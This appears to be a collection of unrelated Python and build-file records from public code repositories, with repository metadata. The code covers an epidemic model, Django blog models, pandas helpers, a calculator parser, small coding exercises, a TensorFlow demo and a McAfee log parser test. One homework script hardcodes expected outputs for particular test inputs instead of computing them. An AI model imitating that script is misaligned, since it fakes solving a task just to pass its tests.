d3c42dc31b3206db3a520a007ea4fb4ce6c1a6fd
|
37ccadb1d3d42a38561c7708391f4c11836f5360
|
refs/heads/master
| 2023-08-16T17:19:07.278554
| 2023-08-13T21:29:51
| 2023-08-13T21:29:51
| 77,261,682
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
'''
SIRD/Optuna1 model simulation Plot
2020-03-28
'''
import numpy as np
from scipy.integrate import odeint
import matplotlib.pylab as plt
from matplotlib.pylab import rcParams
plt.style.use('seaborn-colorblind')
N = 60480000 # community size
t_max = 200
tspan = np.linspace(0.0, t_max, t_max + 1)
# parameters to fit
alpha = 0.623 # 感染率
beta = 0.0505 # 回復率
fatalityrate= 0.03 # 死亡率
I0 = 9995 # Init Infected patients
def sird(v,t):
global alpha, beta,fatalityrate
# v = [S, I, R, D]
x = alpha *v[0] *v[2] / N # infected rate of the day
y = beta * v[1]
dS = -x # S:Susceptible
dI = x - y # I:Infected
dR = y # R:Recovered or Dead
dD = fatalityrate * y
return np.array([dS, dI, dR, dD])
ini_state = [N-I0, I0, 0, 0]
ode_int = odeint(sird, ini_state, tspan)
num = len(ode_int)
for d in range(num):
print(d,ode_int[d])
|
[
"yoshida.ichi@gmail.com"
] |
yoshida.ichi@gmail.com
|
7a09e0bbbfb0ff3a03a00cbce4ceef84c246cfae
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2177/60760/320775.py
|
e9baa7cea28a2c72ead4bdca35056de12a8b98dc
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
n=int(input())
res=n
if res==11:
print(12)
print("6 7 5 8 4 9 3 10 2 11 1 12",end=" ")
elif res==1:
print(2)
print("1 2",end=" ")
elif res==9:
print(10)
print("5 6 4 7 3 8 2 9 1 10",end=" ")
elif res==13:
print(14)
print("7 8 6 9 5 10 4 11 3 12 2 13 1 14",end=" ")
elif res==35:
print(36)
print("18 19 17 20 16 21 15 22 14 23 13 24 12 25 11 26 10 27 9 28 8 29 7 30 6 31 5 32 4 33 3 34 2 35 1 36",end=" ")
elif res==16:
print(17)
print("9 8 10 7 11 6 12 5 13 4 14 3 15 2 16 1 17",end=" ")
else:
print(res)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
09179808823e6090a2772bb6dfde9ff15c641ee6
|
86ce7710dfb1a4598d02a8006ebb3077c9101f29
|
/nekidblog/postsapp/models.py
|
a434d6e5778917beda41daf69fd0ec3cfb6c1931
|
[] |
no_license
|
spoliv/test_task_nekidaem_ru
|
33b9fe8db54bf9d588834963fa3c1b9a5ae02159
|
3fa29a95cce5e2eb698827c0e3b8e89177022ab6
|
refs/heads/main
| 2023-01-30T04:48:25.101257
| 2020-12-10T15:45:16
| 2020-12-10T15:45:16
| 318,528,386
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
from django.db import models
from django.contrib.auth.models import User
class Blog(models.Model):
class Meta:
verbose_name = 'Блог'
verbose_name_plural = 'Блоги'
author = models.ForeignKey(User, on_delete=models.CASCADE)
blog_theme = models.CharField(verbose_name='тема блога', max_length=50)
class Post(models.Model):
class Meta:
verbose_name = 'Пост'
verbose_name_plural = 'Посты'
blog = models.ForeignKey(Blog, on_delete=models.CASCADE)
post_title = models.CharField(verbose_name='заголовок поста', max_length=50)
post_body = models.TextField(verbose_name='текст поста', blank=True)
date_created = models.DateTimeField(verbose_name='создан', auto_now_add=True)
# Create your models here.
|
[
"spoliv@rambler.ru"
] |
spoliv@rambler.ru
|
b5015f583a686346339dadaed0cc14a8864fa920
|
b107883be08ea56bd3a56ddb0e2dd8dacce7db2e
|
/src/polystar/utils/dataframe.py
|
e020875b53a3ba4999062cc4d269e2850ea2cef9
|
[] |
no_license
|
PolySTAR-mtl/cv
|
ef7977b62577e520f6c69a9b7891c7f38e307028
|
27564abe89e7dff612e3630c31e080fae4164751
|
refs/heads/master
| 2023-05-01T16:45:19.777459
| 2021-05-30T10:36:10
| 2021-05-30T10:36:10
| 356,053,312
| 0
| 0
| null | 2021-05-30T10:36:11
| 2021-04-08T21:32:06
|
Python
|
UTF-8
|
Python
| false
| false
| 908
|
py
|
from typing import Any, Callable, Iterable, Union
from pandas import DataFrame
Format = Union[str, Callable]
def format_df_column(df: DataFrame, column_name: str, fmt: Format):
df[column_name] = df[column_name].map(fmt.format)
def format_df_columns(df: DataFrame, column_names: Iterable[str], fmt: Format):
for c in column_names:
format_df_column(df, c, fmt)
def format_df_row(df: DataFrame, loc: Any, fmt: Format):
df.loc[loc] = df.loc[loc].map(make_formater(fmt))
def format_df_rows(df: DataFrame, locs: Iterable[Any], fmt: Format):
for loc in locs:
format_df_row(df, loc, fmt)
def make_formater(fmt: Format) -> Callable:
if isinstance(fmt, str):
return fmt.format
return fmt
def add_percentages_to_df(df: DataFrame, axis: int) -> DataFrame:
return df.applymap(str) + df.div(df.sum(axis=axis), axis=(1 - axis)).applymap(" ({:.1%})".format)
|
[
"mathieu@feedly.com"
] |
mathieu@feedly.com
|
6d253e9041fc0f16e07e2166ab6ba8890b19bf1e
|
511fd0cb7e338bc5c2d5a9d60de8166efd5882fe
|
/pyrecs/icp_compat/ICPSequenceFile.py
|
52f9c298bca501818f68f0444fe3b05b72aba2a2
|
[] |
no_license
|
bmaranville/pyrecs
|
43341af4931538e57c8de7655efbcdbdd9099f02
|
29468ae4d8a4a9de5cac8988fd3620f806a71907
|
refs/heads/master
| 2021-01-15T15:45:47.514371
| 2016-11-04T14:07:50
| 2016-11-04T14:07:50
| 5,635,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,369
|
py
|
from __future__ import with_statement
from StringIO import StringIO
class PyICPSequence:
"""controls and reads from a sequence file, moving the marker around
it is defined as an iterator, so getting the next element moves the marker
can use syntax "for cmd in PyICPSequenceFile(filename):" to iterate
through file, moving the marker
"""
def __init__(self, marker = '%', data = ''):
self.data = data
self.marker = marker
self.last = ''
self.next_command = ''
self.current_command = ''
def LoadData(self):
return self.data
def ParseData(self):
data = self.LoadData()
current_command = None
seek_pos = 0
datalen = len(data)
not_separator = True
def next_cmd(data, seek_pos):
cmd = ''
not_separator = True
while not_separator and seek_pos < datalen:
next_char = data[seek_pos]
if next_char in [';', '\n', '\r']:
not_separator = False
cmd += next_char
seek_pos += 1
return cmd, seek_pos
new_data = ''
match = False
while seek_pos < datalen and match == False:
cmd, new_seek_pos = next_cmd(data, seek_pos)
marker_loc = cmd.rfind(self.marker)
# check to see if there's anything after the marker - if not, proceed
if marker_loc > -1 and cmd[marker_loc+1:].rstrip('; \t\n\r') == '':
#current_command = cmd[:marker_loc]
match = True # we found it! set the flag
current_command = cmd[:marker_loc].strip('; \t\n\r')
replacement_str = cmd[:marker_loc] + cmd[marker_loc+1:]
new_data = data[:seek_pos]+replacement_str
seek_pos = new_seek_pos
if not match:
seek_pos = 0
# or else we've got a match - what's the next command?
next_command = None
commands_left = 0
next_command_found = False
while seek_pos < datalen:
cmd, new_seek_pos = next_cmd(data, seek_pos)
if cmd.strip('; \t\n\r') == '':
new_data += cmd
else: # we have a non-blank command:
commands_left += 1 # add one to the stack
if not next_command_found:
next_command_found = True
next_command = cmd.rstrip('; \t\n\r'+self.marker)
# check to see if it's already got a marker (or more than one) and clear them
# and then put exactly one marker back
end_of_command = len(cmd.rstrip('; \t\r\n'+self.marker))
cmd = cmd[:end_of_command] + self.marker + cmd[end_of_command:].replace(self.marker, '')
#new_data += cmd[:-1] + self.marker + cmd[-1]
new_data += cmd
seek_pos = new_seek_pos
return current_command, next_command, commands_left, new_data
def GetCurrentCommand(self):
current_command, next_command, commands_left, new_data = self.ParseData()
return current_command
def __len__(self):
current_command, next_command, commands_left, new_data = self.ParseData()
return commands_left
def clear(self):
"""move the marker to the last command"""
while self.__len__() > 0:
self.GetNextCommand()
def GetNextCommand(self):
current_command, next_command, commands_left, new_data = self.ParseData()
self.WriteData(new_data)
return next_command
def WriteData(self, new_data):
self.data = new_data
def __iter__(self):
return self
def next(self):
self.next_command = self.GetNextCommand()
if self.next_command == None:
raise StopIteration
else:
self.last = self.next_command
return self.next_command
#def popleft(self):
# return next(self)
class PyICPSequenceFile(PyICPSequence):
"""controls and reads from a sequence file, moving the marker around
it is defined as an iterator, so getting the next element moves the marker
can use syntax "for cmd in PyICPSequenceFile(filename):" to iterate
through file, moving the marker
"""
def __init__(self, filename, marker = '%'):
self.filename = filename
PyICPSequence.__init__(self, marker)
def LoadData(self):
with open(self.filename, 'r') as f:
data = f.read()
return data
def WriteData(self, new_data):
with open(self.filename, 'w') as f:
f.write(new_data)
class PyICPSequenceStringIO(PyICPSequence):
def __init__(self, string_io_obj, marker = '%' ):
self.string_io_obj = string_io_obj
PyICPSequence.__init__(self, marker)
def LoadData(self):
self.string_io_obj.seek(0)
data = self.string_io_obj.read()
return data
def WriteData(self, new_data):
StringIO.truncate(self.string_io_obj, 0)
self.string_io_obj.write(new_data)
|
[
"brian.maranville@nist.gov"
] |
brian.maranville@nist.gov
|
bc583257ba2fa8e75999f1420d42612329c9011a
|
f34c9ba52317b2871ef309d25c6a62ada2a4c4e3
|
/2019-1/exemplos/calc/calc-ast.py
|
6121565647ee90707c33f27b56bed0f9abc48cf7
|
[] |
no_license
|
azurah/compiladores-1
|
b2a24e4dc67b39d106803ce431740918feebeddb
|
b8bcd58aa5c0ffd02b9c24aa3eaa64b8827d9263
|
refs/heads/master
| 2022-03-25T06:55:48.714820
| 2019-12-16T14:38:25
| 2019-12-16T14:38:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,577
|
py
|
import ox
import operator as op
lexer_rules = [
('NUMBER', r'\d+'),
('ADD', r'\+'),
('SUB', r'\-'),
('MUL', r'\*'),
('DIV', r'\/'),
('LPAR', r'\('),
('RPAR', r'\)'),
('VAR', r'[a-zA-Z_]+')
]
lexer = ox.make_lexer(lexer_rules)
tokens = [x for x, _ in lexer_rules]
binop = (lambda x, op, y: (op, x, y))
parser = ox.make_parser([
('expr : term ADD expr', binop),
('expr : term SUB expr', binop),
('expr : term', lambda x: x),
('term : atom MUL term', binop),
('term : atom DIV term', binop),
('term : atom', lambda x: x),
('atom : NUMBER', int),
('atom : VAR', lambda x: ('var', x)),
('atom : LPAR expr RPAR', lambda x, y, z: y),
], tokens)
def find_vars(ast, vars=()):
if not isinstance(ast, tuple):
return set()
head, *tail = ast
if head == 'var':
return {tail[0], *vars}
result = set()
for elem in tail:
result.update(find_vars(elem))
return result
FUNCTIONS = {'+': op.add, '-': op.sub,
'*': op.mul, '/': op.truediv}
def eval_ast(ast, ctx):
if not isinstance(ast, tuple):
return ast
head, *tail = ast
if head == 'var':
return ctx[tail[0]]
else:
args = (eval_ast(x, ctx) for x in tail)
func = FUNCTIONS[head]
return func(*args)
if __name__ == '__main__':
ast = parser(lexer(input('expr: ')))
free_vars = find_vars(ast)
ctx = {x: int(input(x + ': '))
for x in free_vars}
print('result:', eval_ast(ast, ctx))
print('ast:', ast)
|
[
"fabiomacedomendes@gmail.com"
] |
fabiomacedomendes@gmail.com
|
1db6fe1c31490177a0f129ccbd8add2e3939d210
|
ee9655d3ffcdb70ae68692f400096b479b39d0f7
|
/Python/kebabize.py
|
1180f40f74723d5a9da84caa4daaccca95f4a1db
|
[] |
no_license
|
yaelBrown/Codewars
|
4f123387b8c4ea6e55ec1ff5d2ae9b1d674c06cf
|
efa10770b593e48579c256b9d6b69deede64e9ba
|
refs/heads/master
| 2020-11-27T16:02:43.409465
| 2020-03-20T00:59:49
| 2020-03-20T00:59:49
| 229,521,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,091
|
py
|
"""
Modify the kebabize function so that it converts a camel case string into a kebab case.
kebabize('camelsHaveThreeHumps') // camels-have-three-humps
kebabize('camelsHave3Humps') // camels-have-humps
Notes:
the returned string should only contain lowercase letters
"""
import string
def kebabize(string):
out = ""
for l in string:
if not l.isalpha():
continue
elif l.isupper():
out += "-"
out += l
else:
out += l
if out == "": return out
if out[0] == "-": out = out[1:]
return out.lower()
# aa = "this is a string"
# print(aa.isalpha())
# print(kebabize("iLike4Cookies"))
# print("-S-O-S"[:1])
print(kebabize("SOS"))
"""
def kebabize(s):
return ''.join(c if c.islower() else '-' + c.lower() for c in s if c.isalpha()).strip('-')
import re
def kebabize(s):
return re.sub('\B([A-Z])', r'-\1', re.sub('\d', '', s)).lower()
import re
def kebabize(s):
s = ''.join([i for i in s if not i.isdigit()])
kebablist = filter(None, re.split("([A-Z][^A-Z]*)", s))
return "-".join(x.lower() for x in kebablist)
"""
|
[
"yaelrbrown@gmail.com"
] |
yaelrbrown@gmail.com
|
8b186ae2a6c66100621dcf603ad1b02c54d99e63
|
e4200b764d0b4ffba65180e54cf84b30ee84efcc
|
/selfdrive/loggerd/SConscript
|
6a392d15d6fdafd6f37d01e59e8c9462835f717c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
kegman/openpilot
|
c9ba96a72d905956f02c684e065091e023942883
|
54a8614b5a6451154817a4c6c86141c96103ae47
|
refs/heads/kegman-0.7
| 2022-05-22T17:07:16.656336
| 2020-01-23T16:40:55
| 2020-01-23T16:40:55
| 229,979,925
| 105
| 212
|
MIT
| 2022-03-13T05:47:51
| 2019-12-24T17:27:11
|
C
|
UTF-8
|
Python
| false
| false
| 311
|
Import('env', 'messaging', 'common', 'visionipc')
env.Program(['loggerd.cc', 'logger.c', 'raw_logger.cc', 'encoder.c'], LIBS=[
'zmq', 'czmq', 'capnp', 'kj', 'yaml-cpp', 'z',
'avformat', 'avcodec', 'swscale', 'avutil',
'OmxVenc', 'OmxCore', 'yuv',
'bz2', 'cutils', common, 'json', messaging, visionipc])
|
[
"8837066+kegman@users.noreply.github.com"
] |
8837066+kegman@users.noreply.github.com
|
|
f0f3d9ede2624be9ecb55304fb9360137bbef785
|
cf7c928d6066da1ce15d2793dcf04315dda9b9ed
|
/Jungol/Lv1_LCoder_Python/pyg0_함수3/Main_JO_406_함수3_자가진단6.py
|
9cb189b371e5e8cb5f56948b15f087c90bbe53ef
|
[] |
no_license
|
refresh6724/APS
|
a261b3da8f53de7ff5ed687f21bb1392046c98e5
|
945e0af114033d05d571011e9dbf18f2e9375166
|
refs/heads/master
| 2022-02-01T23:31:42.679631
| 2021-12-31T14:16:04
| 2021-12-31T14:16:04
| 251,617,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 296
|
py
|
# 9자리 이하의 자연수를 입력받아 재귀함수를 이용하여 각 자리 숫자의 제곱의 합을 출력하는 프로그램을 작성하시오.
def recursive(n):
if n < 10:
return n*n
return recursive(n//10) + recursive(n%10)
n = int(input())
print(recursive(n))
|
[
"refresh6724@gmail.com"
] |
refresh6724@gmail.com
|
01ecef42b6e7f285755d7f03e8bb2dcc7c993ecf
|
b532a2188d312a377ea89192569897714f500980
|
/memorious/operations/store.py
|
52c9e9a5bb52970965df0014bb536fb4c9aec676
|
[
"MIT"
] |
permissive
|
patcon/memorious
|
b41baff81656c343770d9bec8743a7f710daac1b
|
316a4bc15a83065106de7e34935b77f337bb11e6
|
refs/heads/master
| 2021-08-20T00:32:33.320287
| 2017-11-27T13:53:44
| 2017-11-27T13:53:44
| 112,242,987
| 0
| 0
| null | 2017-11-27T20:08:07
| 2017-11-27T20:08:07
| null |
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
import os
import json
import shutil
from normality import safe_filename
from memorious import settings
def _get_directory_path(context):
"""Get the storage path fro the output."""
path = os.path.join(settings.BASE_PATH, 'store')
path = context.params.get('path', path)
path = os.path.join(path, context.crawler.name)
path = os.path.abspath(os.path.expandvars(path))
try:
os.makedirs(path)
except:
pass
return path
def directory(context, data):
"""Store the collected files to a given directory."""
with context.http.rehash(data) as result:
if not result.ok:
return
content_hash = data.get('content_hash')
if content_hash is None:
context.emit_warning("No content hash in data.")
return
path = _get_directory_path(context)
file_name = data.get('file_name', result.file_name)
file_name = safe_filename(file_name, default='raw')
file_name = '%s.%s' % (content_hash, file_name)
data['_file_name'] = file_name
file_path = os.path.join(path, file_name)
if not os.path.exists(file_path):
shutil.copyfile(result.file_path, file_path)
context.log.info("Store [directory]: %s", file_name)
meta_path = os.path.join(path, '%s.json' % content_hash)
with open(meta_path, 'w') as fh:
json.dump(data, fh)
|
[
"friedrich@pudo.org"
] |
friedrich@pudo.org
|
43a4347035b0440386c7229b773e43eacc80d101
|
27010a7ad70bf69511858a91d42dc7a64e61b66d
|
/src/0342_power_of_four.py
|
76a22ceba8325a13c2b1e510bd9f19870f9f5a0f
|
[
"Apache-2.0"
] |
permissive
|
hariharanragothaman/leetcode-solutions
|
fb7d967f2c6e3f4c936e3c7afe369415bc8d2dc6
|
44e759f80d3c9df382fdf8d694d6378881e3649d
|
refs/heads/master
| 2023-09-03T20:31:59.200701
| 2021-10-18T00:50:56
| 2021-10-18T00:50:56
| 267,927,538
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 571
|
py
|
"""
Given an integer n, return true if it is a power of four. Otherwise, return false.
An integer n is a power of four, if there exists an integer x such that n == 4x.
Example 1:
Input: n = 16
Output: true
Example 2:
Input: n = 5
Output: false
Example 3:
Input: n = 1
Output: true
Constraints:
-231 <= n <= 231 - 1
"""
import math
from math import log2
class Solution:
def isPowerOfFour(self, n: int) -> bool:
"""
x = math.log(n) / math.log(4)
return x.is_integer()
"""
return (n > 0) and log2(n) % 2 == 0
|
[
"hariharanragothaman@gmail.com"
] |
hariharanragothaman@gmail.com
|
f6c388f9433fe0af9510b9b05baaba3657776db1
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_126/128.py
|
0b43d4fbaa876ff9dcf5d33290291df8461be100
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,683
|
py
|
import os
import unittest
import itertools
from python_toolbox.cute_iter_tools import consecutive_pairs
PROB_NAME = 'consonants'
INPUT_TYPE = 'large'
VOWELS = 'aeiou'
def solve(case):
"""break 'case', solve and return the solution"""
name, n = case
l = len(name)
consecutive_consonants = 0
last_end = 0
nval = 0
for idx, c in enumerate(name):
if c not in VOWELS:
consecutive_consonants += 1
else:
consecutive_consonants = 0
if consecutive_consonants >= n:
start, end = idx - n + 1, idx
if consecutive_consonants > n:
start_ss = start
else:
if n == 1:
start_ss = last_end + 1
else:
start_ss = (last_end - n + 2) if last_end > 0 else 0
end_ss = l
last_end = end
left, right = max(start - start_ss + 1, 1), end_ss - end
nval += left * right
return nval
def read_case(lines):
name, n = lines.pop(0).split()
return (name, int(n))
def read_file(filepath):
"""Read the input file and return a list of cases in a tuple format."""
cases = []
with open(filepath, 'rt') as fobj:
lines = fobj.readlines()
num_cases = int(lines.pop(0))
for _ in range(num_cases):
cases.append(read_case(lines))
return cases
def write_results(results, outfile):
with open(outfile, 'wt') as f:
for idx, result in enumerate(results):
f.write('Case #{}: {}\n'.format(idx + 1, result))
def main(infile, outfile):
cases = read_file(infile)
results = [solve(case) for case in cases]
write_results(results, outfile)
if INPUT_TYPE:
main(os.path.join('io', '{}_{}.in'.format(PROB_NAME, INPUT_TYPE)),
os.path.join('io', '{}_{}.out'.format(PROB_NAME, INPUT_TYPE)))
class UnitTest(unittest.TestCase):
CASES = {('quartz', 3): 4,
('straight', 3): 11,
('gcj', 2): 3,
('tsetse', 2): 11,
('pack', 1): 9}
# ('packmyboxwithfivedozenliquorjugs', 1): 516}
# ('z' * 10 ** 6, 4): 0}
def runTest(self):
message = 'Wrong result for case.\nCase: {}\nResult: {}\n'\
'Expected result: {}'
for case, result in self.CASES.iteritems():
self.assertEqual(solve(case), result, message.format(case,
solve(case),
result))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
5eb911a7220230a00c7447f3afc31e62046a0e8e
|
36ff0f28aeb47c03d8e22f69057c12f830e917e8
|
/Blog/admin.py
|
55f78d419afa2db728fbf7600fa18758d465be30
|
[] |
no_license
|
michael-basweti/duke
|
673721540fa1b260508f03518b0043e8e1fc3f14
|
5eae51ceac89e77c6ab712e6311fef9f15fb51ad
|
refs/heads/master
| 2022-12-06T02:53:04.494299
| 2019-07-30T10:47:06
| 2019-07-30T10:47:06
| 195,955,279
| 0
| 0
| null | 2022-11-22T04:09:15
| 2019-07-09T07:25:08
|
CSS
|
UTF-8
|
Python
| false
| false
| 306
|
py
|
from django.contrib import admin
from .models import Blog
class Post(admin.ModelAdmin):
exclude = ('author',)
list_display = ('title', 'author', 'date_added')
def save_model(self, request, obj, form, change):
obj.author = request.user
obj.save()
admin.site.register(Blog, Post)
|
[
"baswetima@gmail.com"
] |
baswetima@gmail.com
|
19a633a72dd7eb16a803a4443726aff405985b67
|
836705d3c321ea8e62f3b2a0ea7e837fe5d45dfd
|
/3-1.py
|
164f25998bf0219f9aa1f0012d4645ca8930a802
|
[] |
no_license
|
Accomlish/tensorflow_learn
|
e11acedbb81f9ef08866a15daf5155853d81cb49
|
19126ae75e1460aa0bb3bd041d96f99db56181d0
|
refs/heads/master
| 2021-05-22T16:50:09.878737
| 2020-04-04T14:36:22
| 2020-04-04T14:36:22
| 253,009,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,473
|
py
|
"""
回归的例子
非线性回归例子
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
#使用numpy生成500样本点
x_data = np.linspace(-1,1,500)[:,np.newaxis]
print(x_data.shape)
noise = np.random.normal(0,0.5,x_data.shape)
y_data = np.square(x_data) + noise
#定义连个placeholder
x = tf.placeholder(tf.float32,[None,1])#浮点型数据,n行1列
y = tf.placeholder(tf.float32,[None,1])
#定义神经网络中间层,
Weight_L1 = tf.Variable(tf.random_normal([1,10]))
biases_L1 = tf.Variable(tf.zeros([1,10]))
Wx_plus_L1 = tf.matmul(x,Weight_L1)+ biases_L1
L1 = tf.nn.tanh(Wx_plus_L1)
#定义输出层
Weight_L2 = tf.Variable(tf.random_normal([10,1]))
biases_L2 = tf.Variable(tf.zeros([1,1]))
Wx_plus_L2 = tf.matmul(L1,Weight_L2) + biases_L2
prediction = tf.nn.tanh(Wx_plus_L2)
#二次代价函数
loss = tf.reduce_mean(tf.square(y-prediction))
#使用梯度下降法
train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for _ in range(2000):
sess.run(train_step,feed_dict={x:x_data,y:y_data})
#获得预测值
prediction_value = sess.run(prediction,feed_dict={x:x_data})
#画图
plt.figure()
plt.scatter(x_data,y_data)
plt.plot(x_data,prediction_value,'r-',lw=5)
plt.show()
|
[
"your email"
] |
your email
|
d1143635201d221e500300bb7ebd02e942d5c100
|
b3b38ebf386bbd323d832ee077ae249a6ab331e9
|
/Day 25/Day 25.py
|
ef5461ad1763efb757ef34109cad57f402fc1d04
|
[] |
no_license
|
bakkerjangert/AoC_2017
|
7bae1b1b9da5b2263d911eff5bbadc2849716be6
|
1c36b80965875cdcbc50c6abe75cc5def72ee573
|
refs/heads/master
| 2023-02-03T05:19:55.933367
| 2020-12-18T14:39:40
| 2020-12-18T14:39:40
| 322,620,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,906
|
py
|
state = 'A'
steps = 12172063
data = [0]
index = 0
def move_left(index):
if index == 0:
data.insert(0, 0)
else:
index -= 1
return index
def move_right(index):
if index == len(data) - 1:
data.append(0)
index += 1
return index
for step in range(steps):
if step % 10000 == 0:
print(f'Currently at {round(step / steps * 100, 2)}%')
if state == 'A':
if data[index] == 0:
data[index] = 1
index = move_right(index)
state = 'B'
else:
data[index] = 0
index = move_left(index)
state = 'C'
elif state == 'B':
if data[index] == 0:
data[index] = 1
index = move_left(index)
state = 'A'
else:
data[index] = 1
index = move_left(index)
state = 'D'
elif state == 'C':
if data[index] == 0:
data[index] = 1
index = move_right(index)
state = 'D'
else:
data[index] = 0
index = move_right(index)
state = 'C'
elif state == 'D':
if data[index] == 0:
data[index] = 0
index = move_left(index)
state = 'B'
else:
data[index] = 0
index = move_right(index)
state = 'E'
elif state == 'E':
if data[index] == 0:
data[index] = 1
index = move_right(index)
state = 'C'
else:
data[index] = 1
index = move_left(index)
state = 'F'
elif state == 'F':
if data[index] == 0:
data[index] = 1
index = move_left(index)
state = 'E'
else:
data[index] = 1
index = move_right(index)
state = 'A'
print(f'The answer = {data.count(1)}')
|
[
"gert-jan.bakker@rhdhv.com"
] |
gert-jan.bakker@rhdhv.com
|
b286d2b08daca3903a5d072416370fd615da25e7
|
95b87a3c8f5492feb8c4faea9202c68f560544b5
|
/tests/parsers/mcafeeav.py
|
084d4b95a852fc78fac08e330c14e5a16a80d540
|
[
"Apache-2.0"
] |
permissive
|
sebdraven/plaso
|
82e87149e845347a0481d9908117c0c227960446
|
77c7f00f0f648b158bd9c9cc3f698dd5ff294b4d
|
refs/heads/master
| 2020-12-02T08:08:48.427006
| 2017-07-08T17:07:50
| 2017-07-08T17:07:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,402
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the McAfee AV Log parser."""
import unittest
from plaso.formatters import mcafeeav # pylint: disable=unused-import
from plaso.lib import timelib
from plaso.parsers import mcafeeav
from tests import test_lib as shared_test_lib
from tests.parsers import test_lib
class McafeeAccessProtectionUnitTest(test_lib.ParserTestCase):
"""Tests for the McAfee AV Log parser."""
@shared_test_lib.skipUnlessHasTestFile([u'AccessProtectionLog.txt'])
def testParse(self):
"""Tests the Parse function."""
parser_object = mcafeeav.McafeeAccessProtectionParser()
storage_writer = self._ParseFile(
[u'AccessProtectionLog.txt'], parser_object)
# The file contains 14 lines which results in 14 events.
self.assertEqual(storage_writer.number_of_events, 14)
event = storage_writer.events[0]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-09-27 14:42:26')
self.assertEqual(event.timestamp, expected_timestamp)
# TODO: Test that the UTF-8 byte order mark gets removed from
# the first line.
# Test this entry:
# 9/27/2013 2:42:26 PM Blocked by Access Protection rule
# SOMEDOMAIN\someUser C:\Windows\System32\procexp64.exe C:\Program Files
# (x86)\McAfee\Common Framework\UdaterUI.exe Common Standard
# Protection:Prevent termination of McAfee processes Action blocked :
# Terminate
event = storage_writer.events[1]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-09-27 14:42:39')
self.assertEqual(event.timestamp, expected_timestamp)
self.assertEqual(event.username, u'SOMEDOMAIN\\someUser')
self.assertEqual(
event.filename, u'C:\\Windows\\System32\\procexp64.exe')
expected_message = (
u'File Name: C:\\Windows\\System32\\procexp64.exe '
u'User: SOMEDOMAIN\\someUser '
u'C:\\Program Files (x86)\\McAfee\\Common Framework\\Frame'
u'workService.exe '
u'Blocked by Access Protection rule '
u'Common Standard Protection:Prevent termination of McAfee processes '
u'Action blocked : Terminate')
expected_short_message = (
u'C:\\Windows\\System32\\procexp64.exe '
u'Action blocked : Terminate')
self._TestGetMessageStrings(event, expected_message, expected_short_message)
if __name__ == '__main__':
unittest.main()
|
[
"joachim.metz@gmail.com"
] |
joachim.metz@gmail.com
|
955e1f1ce5febef1ea2829471b58315b4d9b2f23
|
3eae9c14c119ee2d6a7d02ef1ba5d61420959e3c
|
/modules/core/rwvx/rwsched/src/rwsched_gi_filter.py
|
b06f9bbfdb82967c05b581ec652bad0f46393135
|
[
"Apache-2.0"
] |
permissive
|
RIFTIO/RIFT.ware
|
94d3a34836a04546ea02ec0576dae78d566dabb3
|
4ade66a5bccbeb4c5ed5b56fed8841e46e2639b0
|
refs/heads/RIFT.ware-4.4.1
| 2020-05-21T14:07:31.092287
| 2017-06-05T16:02:48
| 2017-06-05T16:02:48
| 52,545,688
| 9
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,082
|
py
|
#!/usr/bin/python
# STANDARD_RIFT_IO_COPYRIGHT
# -*- Mode: Python; py-indent-offset: 4 -*-
# vim: tabstop=4 shiftwidth=4 expandtab
import sys
# rwsched_instance_ptr_t -> RwschedInstance
renames = {
0: {'rwsched': 'RwSched'},
1: {'instance': 'Instance',
'CFRunLoop': 'CFRunLoop',
'CFRunLoopSource': 'CFRunLoopSource',
'CFRunLoopTimer': 'CFRunLoopTimer',
'CFRunLoopTimerContext': 'CFRunLoopTimerContext',
'CFSocket': 'CFSocket' },
}
def gobjectify(ident):
if not ident.startswith('rwsched_'):
if not ident.startswith('rwsched'):
return ident
# Remove trailing '_[a-z]' from ident
if ident.endswith('ptr_t'):
ident = ident[:-5]
if ident.endswith('_t'):
ident = ident[:-2]
elif ident.endswith('Ref'):
ident = ident[:-3]
s = ''.join(renames.get(depth, {}).get(name, name.title())
for depth, name in enumerate(ident.split('_')))
return s
if __name__ == '__main__':
text = gobjectify(sys.stdin.read().strip())
sys.stdout.write(text)
|
[
"Leslie.Giles@riftio.com"
] |
Leslie.Giles@riftio.com
|
c834c39c8e08fc958e2256b388af4f839efe7988
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
